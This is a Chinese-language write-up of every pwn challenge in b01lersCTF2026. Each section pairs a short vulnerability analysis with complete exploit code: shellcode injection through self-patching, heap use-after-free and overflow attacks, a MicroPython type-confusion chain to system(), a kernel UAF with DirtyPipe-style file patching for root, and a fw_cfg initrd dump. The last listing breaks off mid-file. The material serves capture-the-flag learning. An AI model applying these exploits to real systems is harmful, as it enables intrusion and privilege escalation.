b01lersCTF2026 PWN 方向全题解#

Abstract#

也是ak了一次题目捏

第二次 AK 居然是在神秘的 GPT 的辅助下完成的可恶啊 T.T

最后还是在 Multifiles 上使用了禁忌的力量

不多说，我们直接进题目

Transmutation#

题目分析#

里面最简单的一道题目

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <sys/mman.h>
4

5
#define MAIN ((char *)main)
6
#define CHALL ((char *)chall)
7
#define LEN (MAIN - CHALL)
8

9
int main(void);
10

11
void chall(void) {
12
    char c = getchar();
13
    unsigned char i = getchar();
14
    if (i < LEN) {
15
        CHALL[i] = c;
16
    }
17
}
18

19
int main(void) {
20
    setbuf(stdin, NULL);
21
    setbuf(stdout, NULL);
22
    setbuf(stderr, NULL);
23

24
    mprotect((char *)((long)CHALL & ~0xfff), 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
25

26
    chall();
27
    return 0;
28
}

看checksec，发现基本什么都没开

能发现实际是一个shellcode题

改 a1 的位置为 a2, 总共有 LEN 的大小给你玩

如果把 chall() 最后的 leave; ret 改为 leave; leave

就能够让执行流很丝滑的回滚到 main 函数。于是，我就成功获得了一个循环patch的程序

‍

为了扩展可写范围，将 lea这里改掉，也就是将main的立即数改为 0xdc，就能将可写范围直接改到0xff

之后我们直接预备写完shellcode跳到shellcode处，将 jge 跳往的地方改成shellcode

之后shellcode正常写就行，一个正常的执行 shell

攻击思路 & EXP#

综合起来，攻击思路为

改 ret 为 leave，实现循环写入
改 LEN，实现扩展可写范围
改 jge 终点，实现可控跳入 shellcode
写shellcode，随后运行

1
# pyright: reportWildcardImportFromLibrary=false
2
# ruff: noqa: F403, F405
3

4
from Mypwn import *
5
from pwn import *
6

7
FILE_NAME = "./src/chall"
8
LIBC_PATH = "./src/libc.so.6"
9
LD_PATH = "./src/ld-linux-x86-64.so.2"
10

11
IS_SSL = True
12

13
REMOTE_TARGET = "transmutation.opus4-7.b01le.rs:8443"
14
# REMOTE_TARGET = None
15

16
HOST = REMOTE_TARGET.split(":")[0]
17
# HOST = None
18

19

20
CHALL = 0x401146
21
SHELLCODE_ADDR = 0x4011F3
22

23
RET_OFF = 0x48
24
LEN_OFF = 0x1F
25
JGE_IMM_OFF = 0x31
26
SHELLCODE_OFF = SHELLCODE_ADDR - CHALL
27

28
init(binary_path=FILE_NAME, libc_path=LIBC_PATH, debug=False)
29
logHex, lg, info, debug = get_log_function()
30

31

32
def patch_byte(value, off):
33
    return p8(value)+p8(off)
34

35

36
def build_payload():
37
    shellcode = asm(sc.execve("/bin/sh", 0, 0))
38

39
    payload = b""
40

41
    # ret -> leave，让 chall 收尾时重新跌回 main 的开头。
42
    payload += patch_byte(0xC9, RET_OFF)
43

44
    # 把 lea 到 main 的位移从 0x26 改成 0xdc，于是 LEN 变成 0xff。
45
    payload += patch_byte(0xDC, LEN_OFF)
46

47
    # 把 jge 的落点改到 main 末尾那块原本不会执行的区域。
48
    payload += patch_byte(0x7B, JGE_IMM_OFF)
49

50
    for i, byte in enumerate(shellcode):
51
        payload += patch_byte(byte, SHELLCODE_OFF + i)
52

53
    # i == 0xff 时会走 jge，直接跳进我们刚写好的 shellcode。
54
    payload += patch_byte(0x00, 0xFF)
55
    return payload
56

57

58
io = iopen(
59
    target=REMOTE_TARGET,
60
    binary=FILE_NAME,
61
    libc_path=LIBC_PATH,
62
    ld_path=LD_PATH,
63
    ssl=IS_SSL,
64
    sni=HOST,
65
)
66

67
try:
68
    io.send(build_payload())
69
    io.interactive()
70
finally:
71
    io.close()

‍

Spelling-Bee#

题目分析#

这题目拉了一大坨，真不是给人看的

它主要有两个结构体

1
typedef struct word {
2
  long flags;
3
  long length;
4
  long referenced_by;
5
  void (*code)(void *);
6
  void *param;
7
} word_t;
8

9
typedef struct dictionary {
10
  char *name;
11
  word_t *word;
12
  struct dictionary *next;
13
  bool alloc_name;
14
} dict_t;

开局泄露 dosys地址，等于PIE白开

‍

主要漏洞是 delete word函数没有进行引用检测，也就是存在一个uaf漏洞

攻击思路 & EXP#

我们的攻击链也比较简单

add a; add a c; dele c; 得到 uaf
通过堆风水控制 C.code指向 dosys, C.param 为所执行命令
执行A从而拿到shell

‍

1
# pyright: reportWildcardImportFromLibrary=false
2
# ruff: noqa: F403, F405
3

4
from Mypwn import *
5
from pwn import *
6

7
FILE_NAME = "./src/chall"
8
LIBC_PATH = "./src/libc.so.6"
9
LD_PATH = "./src/ld-linux-x86-64.so.2"
10

11
REMOTE_TARGET = "priority-queue.opus4-7.b01le.rs:8443"
12
# REMOTE_TARGET = None
13
HOST = REMOTE_TARGET.split(":")[0]
14
# HOST = None
15

16
NAME_LEN = 0x7f
17
CODE_PTR_OFF = 0x18
18

19
init(binary_path=FILE_NAME, libc_path=LIBC_PATH, debug=False)
20
_, dopk, _ = Tool.get_arch_packer(elf)
21
logHex, lg, info, debug = get_log_function()
22

23

24
def long_name(head, fill):
25
    return head + fill * (NAME_LEN - len(head))
26

27

28
def add(name, body=b""):
29
    line = b": " + name
30
    if body:
31
        line += b" " + body
32
    line += b" ;"
33
    sl(line)
34

35

36
def dele(name):
37
    sl(b"forget " + name)
38

39

40
io = iopen(
41
    target=REMOTE_TARGET,
42
    binary=FILE_NAME,
43
    libc_path=LIBC_PATH,
44
    ld_path=LD_PATH,
45
    ssl=True,
46
    sni=HOST,
47
)
48

49
try:
50
    rcu(b"maybe you could implement them for me?\n")
51
    dosys = int(rcu(b"\n", drop=True), 16)
52
    logHex("dosys", dosys)
53

54
    w0 = long_name(b"L0", b"A")
55
    w1 = long_name(b"L1", b"B")
56
    w2 = long_name(b"L2", b"C")
57

58
    add(b"s")
59
    add(w0)
60
    add(w1)
61
    add(w2)
62
    add(b"C")
63
    add(b"A", b"C")
64

65
    dele(b"s")
66
    dele(w0)
67
    dele(w1)
68
    dele(b"C")
69
    dele(w2)
70

71
    fake = b"A" * CODE_PTR_OFF + dopk(dosys)[:6]
72
    add(fake)
73

74
    cmd = b"/bin/sh${IFS}-i;#".ljust(NAME_LEN, b'A')
75
    add(cmd)
76
    sl(b'A') # trigger
77
    rcu(b'/bin/sh: ')
78
    io.interactive()
79
finally:
80
    io.close()

‍

Priority - Queue#

题目分析#

‍

1
void insert(void) {
2
    puts("Message: ");
3
    char buffer[128] = { 0 };
4
    scanf("%127s", buffer);
5

6
    char *chunk = malloc(strlen(buffer) + 1);
7
    strcpy(chunk, buffer);
8

9
    if (capacity == size) {
10
        int new_capacity = capacity * CAPACITY_MULTIPLIER;
11
        char **new = calloc(new_capacity, sizeof(char *));
12
        memcpy(new, array, capacity * sizeof(char *));
13
        free(array);
14
        array = new;
15
        capacity = new_capacity;
16
    }
17

18
    array[size] = chunk;
19
    move_up(size++);
20
}
21

22
void delete(void) {
23
    if (size == 0) {
24
        puts("Queue is empty!");
25
        return;
26
    }
27

28
    puts(array[0]);
29
    free(array[0]);
30

31
    array[0] = array[--size];
32
    move_down(0);
33
}
34

35
void peek(void) {
36
    if (size == 0) {
37
        puts("Queue is empty!");
38
        return;
39
    }
40

41
    puts(array[0]);
42
}
43

44
void edit(void) {
45
    if (size == 0) {
46
        puts("Queue is empty!");
47
        return;
48
    }
49

50
    puts("Message: ");
51
    read(fileno(stdin), array[0], 32);
52

53
    move_down(0);
54
}

‍

题目实现了对字符串最小堆的优先队列的 insert (add)、delete、peek(show)、edit、count

其中edit固定写 32大小，即存在越界写

add分配大小取决于你输入长度

‍

题目会将flag读到一个chunk里

1
FILE *file = fopen("flag.txt", "r");
2
if (file) {
3
    char *flag = malloc(100);
4
    fgets(flag, 100, file);
5
    fclose(file);
6
}

那么，我们甚至都不用去拿shell了，只要leak Heap中的这个chunk就行

攻击思路 & EXP#

我们的思路也就很简单了

通过申请 9 个 chunk，触发 array 的扩容。这时扩容出的array里会存储Heap中的地址
通过两次edit越界写覆盖掉array的chunk头，再用show来泄露出Heap地址
再将 chunk9 的大小伪造为 0x30或更大，再通过add申请出来，从而替换 array[0]
最后show拿到flag

1
# pyright: reportWildcardImportFromLibrary=false
2
# ruff: noqa: F403, F405
3

4
from Mypwn import *
5

6

7
FILE_NAME = "./src/chall"
8
LIBC_PATH = "./src/libc.so.6"
9

10
# REMOTE_TARGET = "priority-queue.opus4-7.b01le.rs:8443"
11
REMOTE_TARGET = None
12
# HOST = REMOTE_TARGET.split(":")[0]
13
HOST = None
14

15
PROMPT = b"Operation (insert/delete/peek/edit/count/quit): \n"
16
ASK = b"Message: \n"
17
BAD = b"\x00\t\n\v\f\r "
18
HEAP_TO_FLAG = 0x1C0
19

20
init(binary_path=FILE_NAME, libc_path=LIBC_PATH, debug=False)
21
unpk, dopk, _ = Tool.get_arch_packer(elf)
22
logHex, lg, info, debug = get_log_function()
23

24

25
def add(msg):
26
    sl(b"insert")
27
    rcu(ASK)
28
    sl(msg)
29
    rcu(PROMPT)
30

31

32
def dele():
33
    sl(b"delete")
34
    return rcu(PROMPT, drop=True)
35

36

37
def edit(msg):
38
    sl(b"edit")
39
    rcu(ASK)
40
    s(msg)
41
    rcu(PROMPT)
42

43

44
def show():
45
    sl(b"peek")
46
    return rcu(PROMPT, drop=True)
47

48

49
def leak_flag_ptr():
50
    payload = flat([
51
        b"z\x00",
52
        b"A" * 14,
53
        dopk(0), dopk(0x21)
54
    ]) # 使得chunk8排序到chunk9后，且edit不破坏chunk9的结构
55
    edit(payload)
56
    edit(b"B" * 32) # 覆盖掉 array 的 chunk头，使得进行 show 时能泄露heap地址
57

58
    data = show()
59
    pos = data.find(b"B" * 32)
60

61
    heap = unpk(data[pos + 32 : pos + 38])
62
    flag_ptr = dopk(heap - HEAP_TO_FLAG)[:6]
63

64
    logHex("heap", heap)
65
    logHex("flag_ptr", unpk(flag_ptr))
66
    return flag_ptr
67

68

69
def poison_array(flag_ptr):
70
    edit(b"~\x00" + b"C" * 30)
71
    edit(b"\xff\x00" + b"D" * 14 + dopk(0) + dopk(0x31))
72
    dele()
73
    add(b"z" * 0x20 + flag_ptr)
74

75

76
io = iopen(
77
    target=REMOTE_TARGET,
78
    binary=FILE_NAME,
79
    libc_path=LIBC_PATH,
80
    ssl=True,
81
    sni=HOST,
82
)
83

84
try:
85
    rcu(PROMPT)
86

87
    for ch in b"abcdefghi":
88
        add(bytes([ch]))
89

90
    for _ in range(7):
91
        dele()
92

93
    flag_ptr = leak_flag_ptr()
94
    poison_array(flag_ptr)
95
    data = show()
96
    print(data.decode("latin1", "replace"), end="")
97
finally:
98
    io.close()

‍

Micromicromicropython#

题目分析#

1
FROM alpine:3.23.3 AS builder
2

3
RUN apk add --no-cache build-base git python3
4
# latest stable release at the time of developing this challenge
5
RUN git clone --depth 1 --branch v1.27.0 https://github.com/micropython/micropython.git /opt/micropython
6
WORKDIR /opt/micropython/ports/unix
7

8
# patch out os ;)
9
RUN sed -i 's/#define MICROPY_PY_OS (1)/\/\/ #define MICROPY_PY_OS (1)/' \
10
        ./variants/minimal/mpconfigvariant.h
11

12
RUN make -j4 submodules
13
RUN make -j4 VARIANT=minimal
14

15
# create catflag
16
WORKDIR /opt
17
COPY catflag.c .
18
RUN gcc -o catflag catflag.c
19

20
FROM alpine:3.23.3 AS app
21
COPY --from=builder /opt/micropython/ports/unix/build-minimal/micropython /usr/local/bin/micropython
22
COPY --from=builder /opt/catflag /catflag
23

24
RUN mkdir -p /app
25
RUN echo -ne "#!/bin/sh\nexec /usr/local/bin/micropython -i" > /app/run
26

27
RUN chmod 755 /app/run && \
28
    chmod 111 /catflag
29

30
FROM pwn.red/jail
31
COPY --from=app / /srv
32

33
ENV JAIL_TIME=120

环境给了一个 Micropython，还给你 os 给砍了

我们在网上可以找到这么一个bug: https://github.com/micropython/micropython/issues/18639
这个bug可以通过类型混淆，来做到任意对象导入。

而这个题目实际上只是不能import os，不是底层接口没了

因而我们可以通过伪造 module 再导入从而拿到 vfs，再泄露libc，从而在后面伪造system，最后调用实现RCE

攻击思路 & EXP#

1
# pyright: reportWildcardImportFromLibrary=false
2
# ruff: noqa: F403, F405
3
import re
4
import time
5

6
from Mypwn import *
7

8

9
FILE_NAME = None
10
LIBC_PATH = None
11
LD_PATH = None
12

13
REMOTE_TARGET = "micromicromicropython.opus4-7.b01le.rs:8443"
14
# REMOTE_TARGET = None
15
HOST = REMOTE_TARGET.split(":")[0]
16
# HOST = None
17

18
PRINT_TO_VFS_POSIX = 0x2F9E0 - 0x2F630
19
PRINT_TO_FUN1_TYPE = 0x2E550 - 0x2F630
20
STR_DATA_OFF = 24
21
PROMPTS = (b">>> ", b"... ")
22
SYSTEM_SIG = b"\x41\x56\x31\xc0\xb9\x12\x00\x00\x00\x41\x55\x41\x54\x55\x48\x89"
23

24
init(binary_path=FILE_NAME, libc_path=LIBC_PATH, debug=False)
25
logHex, lg, info, debug = get_log_function()
26

27

28
def read_prompt(wait=0.4):
29
    end = time.time() + wait
30
    data = b""
31
    while time.time() < end:
32
        try:
33
            part = io.recv(timeout=0.08)
34
        except EOFError:
35
            break
36
        if not part:
37
            continue
38
        data += part
39
        if data.endswith(PROMPTS):
40
            break
41
    return data.decode("latin1", "replace")
42

43
def py(line, wait=0.4):
44
    sl(line.encode())
45
    time.sleep(wait)
46
    return read_prompt(wait + 0.2)
47

48
def take_num(text):
49
    hit = re.search(r"-?\d+", text)
50
    if hit is None:
51
        exit(3)
52
    return int(hit.group(0))
53

54
def fake_import(name, ptr):
55
    target = str(ptr) if isinstance(ptr, int) else ptr
56
    py(
57
        f"pair=range(id({name!r}), {target}, 1);"
58
        "sys.modules['m']=staticmethod(range(0,1,id(pair)+8));"
59
        "exec('from m import *')"
60
    )
61

62

63

64
io = iopen(target=REMOTE_TARGET, ssl=True, sni=HOST)
65
try:
66
    read_prompt(0.3)
67

68
    print_addr = take_num(py("import sys; print(id(print))"))
69
    vfs_type = print_addr + PRINT_TO_VFS_POSIX
70
    fun1_type = print_addr + PRINT_TO_FUN1_TYPE
71
    logHex("print_addr", print_addr)
72

73
    fake_import("VFS", vfs_type)
74
    py("os=VFS()")
75

76
    maps = py("print(os.open('/proc/self/maps','r').read())", 0.7)
77
    hit = re.search(
78
        r"([0-9a-f]+)-[0-9a-f]+\s+r--p\s+00000000\s+\S+\s+\S+\s+/lib/ld-musl-x86_64\.so\.1",
79
        maps,
80
    )
81
    if hit is None:
82
        exit(1)
83
    musl_base = int(hit.group(1), 16)
84
    logHex("musl_base", musl_base)
85

86
    py("data=os.open('/lib/ld-musl-x86_64.so.1','rb').read()", 1.0)
87
    system_off = take_num(py(f"print(data.find({SYSTEM_SIG}))", 0.8))
88
    if system_off < 0:
89
        exit(2)
90
    system_addr = musl_base + system_off
91
    logHex("system_addr", system_addr)
92

93
    py("mem=os.open('/proc/self/mem','rb')")
94
    py("cmd='exec /bin/sh -i'")
95
    py(f"mem.seek(id(cmd)+{STR_DATA_OFF})")
96
    cmd_ptr = take_num(py("print(int.from_bytes(mem.read(8),'little'))"))
97
    logHex("cmd_ptr", cmd_ptr)
98

99
    fake_import("command", cmd_ptr)
100
    py(f"rs=range({fun1_type}, {system_addr}, 1)")
101
    fake_import("system", "id(rs)+8")
102
    sl(b"system(command)")
103
    io.interactive()
104
finally:
105
    io.close()

‍

ThroughTheWall#

题目分析#

依旧内核pwn

简单的复原了一下几个结构体

1
#define MAX_RULES 0x100
2
#define RULE_SIZE 0x400
3

4
struct firewall_rule {
5
    u32 src_ip;
6
    u32 dst_ip;
7
    u16 port;
8
    u16 rule_type;
9
    char comment[RULE_SIZE - 0x0c];
10
};
11

12
struct fw_rw_req {
13
    u32 idx;
14
    u32 pad;
15
    u64 offset;
16
    u64 len;
17
    u8 data[RULE_SIZE];
18
};
19

20
static struct firewall_rule *rules[MAX_RULES];

‍

add 输入大致是这样的: "10.0.0.1 10.0.0.2 1337 1 x"

会解析成下面这样

1
src        -> 10.0.0.1
2
dst        -> 10.0.0.2
3
port       -> 1337
4
rule_type  -> 1
5
comment    -> x

‍

add, edit, dele, show 四个功能全了

一眼看过来感觉就是 UAF 了

进来一看，确实没置空

‍

攻击思路 & EXP#

题目的打法也很简单

通过UAF拿到相应内存页，走 DirtyPipe改 drop_priv 中间对用户权限的设置为 gid=0 uid=0 即可

1
#define _GNU_SOURCE
2

3
#include <errno.h>
4
#include <fcntl.h>
5
#include <sched.h>
6
#include <stdbool.h>
7
#include <stdint.h>
8
#include <stdio.h>
9
#include <stdlib.h>
10
#include <string.h>
11
#include <sys/ioctl.h>
12
#include <unistd.h>
13

14
#define DEVICE_PATH "/dev/firewall"
15

16
#define FW_ADD_RULE  0x41004601UL
17
#define FW_DEL_RULE  0x40044602UL
18
#define FW_EDIT_RULE 0x44184603UL
19
#define FW_SHOW_RULE 0x84184604UL
20

21
#define RULE_SIZE 0x400
22
#define PIPE_BUF_CAN_MERGE 0x10
23

24
#define SETGID_IMM_OFF 5718
25
#define SETUID_IMM_OFF 5728
26

27
struct edit_req {
28
    uint32_t idx;
29
    uint32_t pad;
30
    uint64_t offset;
31
    uint64_t len;
32
    uint8_t data[RULE_SIZE];
33
};
34

35
static void nope(const char *what) {
36
    perror(what);
37
    _exit(1);
38
}
39

40
static int must_open(const char *path, int flags) {
41
    int fd = open(path, flags);
42
    if (fd < 0) {
43
        nope(path);
44
    }
45
    return fd;
46
}
47

48
static void sit_on_cpu0(void) {
49
    cpu_set_t set;
50

51
    CPU_ZERO(&set);
52
    CPU_SET(0, &set);
53
    if (sched_setaffinity(0, sizeof(set), &set) != 0) {
54
        nope("sched_setaffinity");
55
    }
56
}
57

58
static int add_one(int fd, const char *rule) {
59
    char buf[0x100];
60

61
    memset(buf, 0, sizeof(buf));
62
    snprintf(buf, sizeof(buf), "%s", rule);
63
    return (int)ioctl(fd, FW_ADD_RULE, buf);
64
}
65

66
static void del_one(int fd, uint32_t idx) {
67
    if (ioctl(fd, FW_DEL_RULE, idx) < 0) {
68
        nope("FW_DEL_RULE");
69
    }
70
}
71

72
static void poke_one(int fd, uint32_t idx, uint64_t off, const void *buf, size_t len) {
73
    struct edit_req req;
74

75
    memset(&req, 0, sizeof(req));
76
    req.idx = idx;
77
    req.offset = off;
78
    req.len = len;
79
    memcpy(req.data, buf, len);
80
    if (ioctl(fd, FW_EDIT_RULE, &req) < 0) {
81
        nope("FW_EDIT_RULE");
82
    }
83
}
84

85
static void peek_one(int fd, uint32_t idx, void *buf, size_t len) {
86
    struct edit_req req;
87

88
    memset(&req, 0, sizeof(req));
89
    req.idx = idx;
90
    req.len = len;
91
    if (ioctl(fd, FW_SHOW_RULE, &req) < 0) {
92
        nope("FW_SHOW_RULE");
93
    }
94
    memcpy(buf, req.data, len);
95
}
96

97
static void dirty_pipe_write(int fwfd, uint32_t idx, const char *path, off_t off, const void *buf, size_t len) {
98
    uint8_t tmp[0x20];
99
    uint32_t flags;
100
    off_t pos;
101
    int p[2];
102
    int fd;
103

104
    if (pipe(p) != 0) {
105
        nope("pipe");
106
    }
107

108
    fd = must_open(path, O_RDONLY);
109
    pos = off - 1;
110
    if (splice(fd, &pos, p[1], NULL, 1, 0) != 1) {
111
        nope("splice");
112
    }
113
    close(fd);
114

115
    peek_one(fwfd, idx, tmp, sizeof(tmp));
116
    memcpy(&flags, tmp + 0x18, sizeof(flags));
117
    flags |= PIPE_BUF_CAN_MERGE;
118
    poke_one(fwfd, idx, 0x18, &flags, sizeof(flags));
119

120
    if (write(p[1], buf, len) != (ssize_t)len) {
121
        nope("write(pipe)");
122
    }
123

124
    close(p[0]);
125
    close(p[1]);
126
}
127

128
int main(void) {
129
    static const uint8_t zero4[4] = {0, 0, 0, 0};
130
    int fwfd;
131
    int idx;
132

133
    sit_on_cpu0();
134

135
    fwfd = must_open(DEVICE_PATH, O_RDWR);
136
    idx = add_one(fwfd, "10.0.0.1 10.0.0.2 1337 1 x");
137
    if (idx < 0) {
138
        nope("FW_ADD_RULE");
139
    }
140

141
    del_one(fwfd, (uint32_t)idx);
142
    dirty_pipe_write(fwfd, (uint32_t)idx, "/bin/drop_priv", SETGID_IMM_OFF, zero4, sizeof(zero4));
143
    dirty_pipe_write(fwfd, (uint32_t)idx, "/bin/drop_priv", SETUID_IMM_OFF, zero4, sizeof(zero4));
144

145
    close(fwfd);
146
    puts("[*] patched /bin/drop_priv");
147
    puts("[*] exit the current shell and init will respawn a root shell");
148
    return 0;
149
}

‍

Multifiles#

题目分析#

其实这个题目，我是用的一种取巧的方式做出来的。

当你去看 Dockerfile_build 时，会发现 flag 被直接写进了 ${rootfs}/root/flag.txt 里，而这一整个 rootfs 又被打包为了启动资源。

也就是说，我们如果能够通过某种方式将整个包弄出来，让我们能读写，那就会简单不知道多少倍了

而对于 QEMU，有一个叫做 fw_cfg 的东西，虽然配置中将 fw_cfg 关了，但是对于该题，我们可以通过修改 I/O 的 bitmap 来拿到读的权限。

‍

攻击思路 & EXP#

对于这道题目，我是这样构造利用链的:

通过 gdt 加上 pipe 操作拿到 physmap
通过 physmap的基址，拿到 TSS 的地址
再通过一个shellcode将 iomap_base 的两个字节改成 0x3000，从而获得 IO 能力
最后使用 fw_cfg 将 initrd 拉出来，从里面掏出flag

1
#define _GNU_SOURCE
2

3
#include <arpa/inet.h>
4
#include <setjmp.h>
5
#include <signal.h>
6
#include <stddef.h>
7
#include <stdint.h>
8
#include <stdio.h>
9
#include <stdlib.h>
10
#include <string.h>
11
#include <sys/io.h>
12
#include <sys/mman.h>
13
#include <sys/ptrace.h>
14
#include <sys/types.h>
15
#include <sys/user.h>
16
#include <sys/wait.h>
17
#include <ucontext.h>
18
#include <unistd.h>
19
#include <zlib.h>
20

21
#define WATCH_ADDR 0xdead000
22
#define TSS_PHYS 0x0f806000ULL
23

24
#define FW_CFG_PORT_SEL 0x510
25
#define FW_CFG_PORT_DATA 0x511
26

27
#define FW_CFG_INITRD_SIZE 0x0b
28
#define FW_CFG_INITRD_DATA 0x12
29

30
static uint64_t fault_err;
31
static jmp_buf jb;
32
static char sig_stack[0x4000];
33

34
static uint8_t arb_w_shellcode[] = {
35
    235, 10, 73, 112, 51, 1, 0, 0, 0, 0, 51, 0, 80, 83, 81, 82, 72, 184, 72,
36
    184, 2, 112, 51, 1, 0, 0, 72, 187, 0, 0, 72, 255, 24, 0, 0, 0, 185, 0,
37
    114, 51, 1, 64, 0, 241, 128, 233, 13, 72, 137, 1, 72, 131, 193, 8, 72, 137,
38
    25, 72, 131, 233, 8, 72, 137, 226, 72, 137, 252, 72, 131, 196, 16, 255,
39
    225, 72, 137, 212, 90, 89, 91, 88, 195
40
};
41

42
static void die(const char *msg) {
43
    perror(msg);
44
    exit(1);
45
}
46

47
static void fail(const char *msg) {
48
    fprintf(stderr, "%s\n", msg);
49
    exit(1);
50
}
51

52
static void on_segv(int sig, siginfo_t *info, void *ctx) {
53
    ucontext_t *u = (ucontext_t *)ctx;
54

55
    (void)sig;
56
    (void)info;
57
    fault_err = (uint64_t)u->uc_mcontext.gregs[REG_ERR];
58
    u->uc_mcontext.gregs[REG_RSP] = (uint64_t)(sig_stack + 0x1000);
59
    longjmp(jb, 1);
60
}
61

62
static void setup_sig(void) {
63
    stack_t ss;
64
    struct sigaction sa;
65

66
    memset(&ss, 0, sizeof(ss));
67
    ss.ss_size = sizeof(sig_stack);
68
    ss.ss_sp = sig_stack;
69
    if (sigaltstack(&ss, NULL) != 0) {
70
        die("sigaltstack");
71
    }
72

73
    memset(&sa, 0, sizeof(sa));
74
    sa.sa_sigaction = on_segv;
75
    sa.sa_flags = SA_ONSTACK | SA_SIGINFO;
76
    sigfillset(&sa.sa_mask);
77
    if (sigaction(SIGSEGV, &sa, NULL) != 0) {
78
        die("sigaction");
79
    }
80
}
81

82
static void do_iret(uint64_t addr) {
83
    asm volatile(
84
        ".intel_syntax noprefix\n"
85
        "mov rsp, %0\n"
86
        "sub rsp, 9\n"
87
        "iretq\n"
88
        ".att_syntax prefix\n"
89
        :
90
        : "r"(addr)
91
        : "memory"
92
    );
93
}
94

95
static void arm_watch(pid_t pid, uint64_t addr) {
96
    uint64_t dr0_off = offsetof(struct user, u_debugreg[0]);
97
    uint64_t dr6_off = offsetof(struct user, u_debugreg[6]);
98
    uint64_t dr7_off = offsetof(struct user, u_debugreg[7]);
99

100
    if (ptrace(PTRACE_POKEUSER, pid, dr0_off, addr) != 0 ||
101
        ptrace(PTRACE_POKEUSER, pid, dr7_off, 0xf0101) != 0 ||
102
        ptrace(PTRACE_POKEUSER, pid, dr6_off, 0) != 0) {
103
        die("ptrace(POKEUSER)");
104
    }
105
}
106

107
static void kid(void) {
108
    int pipes[2];
109

110
    if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0) {
111
        die("ptrace(TRACEME)");
112
    }
113
    raise(SIGSTOP);
114

115
    if (mmap((void *)WATCH_ADDR, 0x1000, PROT_READ | PROT_WRITE,
116
             MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_POPULATE, -1, 0) == MAP_FAILED) {
117
        die("mmap");
118
    }
119

120
    sleep(1);
121
    pipe(pipes);
122
    write(pipes[1], (void *)WATCH_ADDR, 1);
123
    _exit(0);
124
}
125

126
static void trip_debug(void) {
127
    pid_t pid = fork();
128
    int st;
129

130
    if (pid < 0) {
131
        die("fork");
132
    }
133
    if (pid == 0) {
134
        kid();
135
    }
136

137
    waitpid(pid, &st, 0);
138
    arm_watch(pid, WATCH_ADDR);
139
    ptrace(PTRACE_CONT, pid, 0, 0);
140

141
    while (1) {
142
        waitpid(pid, &st, 0);
143
        if (WIFEXITED(st)) {
144
            break;
145
        }
146
        if (WIFSTOPPED(st)) {
147
            int sig = WSTOPSIG(st);
148
            ptrace(PTRACE_CONT, pid, 0, sig == SIGTRAP ? 0 : sig);
149
        }
150
    }
151
}
152

153
static uint64_t get_physmap(void) {
154
    char gdt[10];
155
    uint64_t gdt_addr;
156
    uint64_t ist3;
157
    uint64_t physmap = 0xffff000000000000ULL;
158
    int pipes[2];
159
    int i;
160

161
    asm volatile(
162
        ".intel_syntax noprefix\n"
163
        "sgdt [%0]\n"
164
        ".att_syntax prefix\n"
165
        :
166
        : "r"(&gdt)
167
        : "memory"
168
    );
169

170
    memcpy(&gdt_addr, &gdt[2], sizeof(gdt_addr));
171
    ist3 = gdt_addr + 0xffc8;
172

173
    for (i = 0; i < 3; i++) {
174
        pipe(pipes);
175
        if (!fork()) {
176
            if (setjmp(jb) == 0) {
177
                do_iret(ist3 + 3 + i);
178
            }
179
            write(pipes[1], &fault_err, sizeof(fault_err));
180
            _exit(0);
181
        }
182
        read(pipes[0], &fault_err, sizeof(fault_err));
183
        fault_err >>= 8;
184
        fault_err &= 0xff;
185
        physmap += (fault_err << ((3 + i) * 8));
186
    }
187

188
    return physmap & 0xfffffffff0000000ULL;
189
}
190

191
static void poke_iomap(uint64_t addr) {
192
    void *code_mapping;
193
    uint64_t gadget = 0x3000;
194
    int i;
195

196
    code_mapping = mmap((void *)0x1337000, 0x1000,
197
                        PROT_READ | PROT_WRITE | PROT_EXEC,
198
                        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
199
                        -1, 0);
200
    if (code_mapping == MAP_FAILED) {
201
        die("mmap(code)");
202
    }
203

204
    memcpy(code_mapping, arb_w_shellcode, sizeof(arb_w_shellcode));
205
    for (i = 0; i < 2; i++) {
206
        ((void (*)(unsigned long, unsigned char))code_mapping)(addr + i,
207
            (gadget >> (i * 8)) & 0xff);
208
    }
209
}
210

211
static uint32_t fw32(uint16_t selector) {
212
    uint32_t v = 0;
213
    int i;
214

215
    outw(selector, FW_CFG_PORT_SEL);
216
    for (i = 0; i < 4; i++) {
217
        ((uint8_t *)&v)[i] = inb(FW_CFG_PORT_DATA);
218
    }
219
    return v;
220
}
221

222
static uint8_t *grab_initrd(size_t *out_size) {
223
    uint32_t size;
224
    uint8_t *buf;
225
    uint32_t i;
226

227
    size = fw32(FW_CFG_INITRD_SIZE);
228
    if (size == 0) {
229
        fail("fw_cfg returned empty initrd");
230
    }
231

232
    buf = malloc(size);
233
    if (!buf) {
234
        die("malloc(initrd)");
235
    }
236

237
    outw(FW_CFG_INITRD_DATA, FW_CFG_PORT_SEL);
238
    for (i = 0; i < size; i++) {
239
        buf[i] = inb(FW_CFG_PORT_DATA);
240
    }
241

242
    *out_size = size;
243
    return buf;
244
}
245

246
static uint8_t *inflate_gz(const uint8_t *src, size_t src_len, size_t *out_len) {
247
    z_stream strm;
248
    uint8_t *dst;
249
    size_t cap = 8 * 1024 * 1024;
250
    int ret;
251

252
    memset(&strm, 0, sizeof(strm));
253
    if (inflateInit2(&strm, 16 + MAX_WBITS) != Z_OK) {
254
        fail("inflateInit2 failed");
255
    }
256

257
    dst = malloc(cap);
258
    if (!dst) {
259
        die("malloc(gunzip)");
260
    }
261

262
    strm.next_in = (Bytef *)src;
263
    strm.avail_in = (uInt)src_len;
264

265
    while (1) {
266
        if (strm.total_out == cap) {
267
            uint8_t *new_dst;
268
            cap *= 2;
269
            new_dst = realloc(dst, cap);
270
            if (!new_dst) {
271
                die("realloc(gunzip)");
272
            }
273
            dst = new_dst;
274
        }
275

276
        strm.next_out = dst + strm.total_out;
277
        strm.avail_out = (uInt)(cap - strm.total_out);
278
        ret = inflate(&strm, Z_NO_FLUSH);
279
        if (ret == Z_STREAM_END) {
280
            break;
281
        }
282
        if (ret != Z_OK) {
283
            fprintf(stderr, "inflate failed: %d\n", ret);
284
            exit(1);
285
        }
286
    }
287

288
    *out_len = strm.total_out;
289
    inflateEnd(&strm);
290
    return dst;
291
}
292

293
static uint32_t hex32(const char *s, size_t n) {
294
    char tmp[9];
295

296
    if (n != 8) {
297
        fail("unexpected hex width");
298
    }
299
    memcpy(tmp, s, 8);
300
    tmp[8] = '\0';
301
    return (uint32_t)strtoul(tmp, NULL, 16);
302
}
303

304
